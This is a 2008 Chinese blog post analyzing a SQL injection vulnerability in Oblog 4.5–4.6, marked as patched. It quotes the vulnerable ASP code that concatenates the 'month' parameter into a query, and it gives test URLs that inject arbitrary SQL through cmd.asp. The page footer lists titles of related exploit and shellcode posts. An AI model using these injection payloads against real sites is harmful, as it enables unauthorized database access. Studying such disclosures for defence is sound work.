Date:2008-5-15
Author:Yamato[ BCT ]
Version:Oblog 4.5-4.6 sql
代码分析:
文件In/Class_UserCommand.asp :
strMonth=Request("month") //第63行
strDay=Request("day")
……
Case "month" //第84行
Dim LastDay
G_P_FileName = G_P_FileName & "month&month=" & strMonth
strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"
mYear=Left(strMonth,4)
mMonth=Right(strMonth,2)
If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then
LastDay = "31"……
Else //第109行
SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "
构造合适的变量strMonth进行注射
测试方法:
http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01
strDay变量从month中获得日期数据,并判断strDay是否为日期数据。所以构造的注射语句为:
http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01
执行sql语句采用rst.Open strSql,Conn,1,1
不能修改记录集.
夜火 & 轨迹's Blog
免费网络资源-网络新闻-计算机技术-网络安全-计算机病毒—15897.com(要我发就齐) 夜火&轨迹共用的Blog
2008-6-30 16:43:51
Oblog最新注入漏洞分析(已修补)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火&轨迹's Blog [ http://www.15897.com/ ]
本文链接地址: http://www.15897.com/blog/post/Oblog-SQL-injection-loophole-latest-Fixes.html
Tags: Oblog 注入 漏洞信息 技术类
发布:xloong |
分类:技术文章 |
评论:0 |
引用:0|
RSS订阅
|浏览:
收藏到网摘
- 相关文章:
Ghost有漏洞 镜像恢复需小心陷阱 (2008-6-16 12:29:21)
如何检查自己是否成为他人肉鸡 (2008-6-12 19:40:12)
Pangolin v1.3.0.630 - ZwelL开发的号称最好的SQL注入工具 (2008-6-7 22:56:44)
Ubuntu 8.04 LTS 曝DoS攻击漏洞 (2008-6-4 21:54:20)
高手常用技巧应用十大诀窍(转) (2008-6-4 9:27:36)
phpwind管理权限泄露漏洞利用程序PHP版 (2008-6-2 21:24:16)
Flash 0DAY Shellcode位置与生成器 (2008-6-2 20:0:21)
phpwind 0day 管理权限泄露漏洞 + exploit 利用程序 (2008-6-1 16:10:32)
cookies的注入方法和原理 (2008-5-31 17:21:3)
dvbbs8.2(access/sql)版 login.asp远程注入漏洞exploit (2008-5-31 15:45:18)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
订阅本站
Search
最近发表
最近留言
图标汇集
只要1毛钱的正版卡巴
网站分类
夜火的碎碎念
文章归档
ADs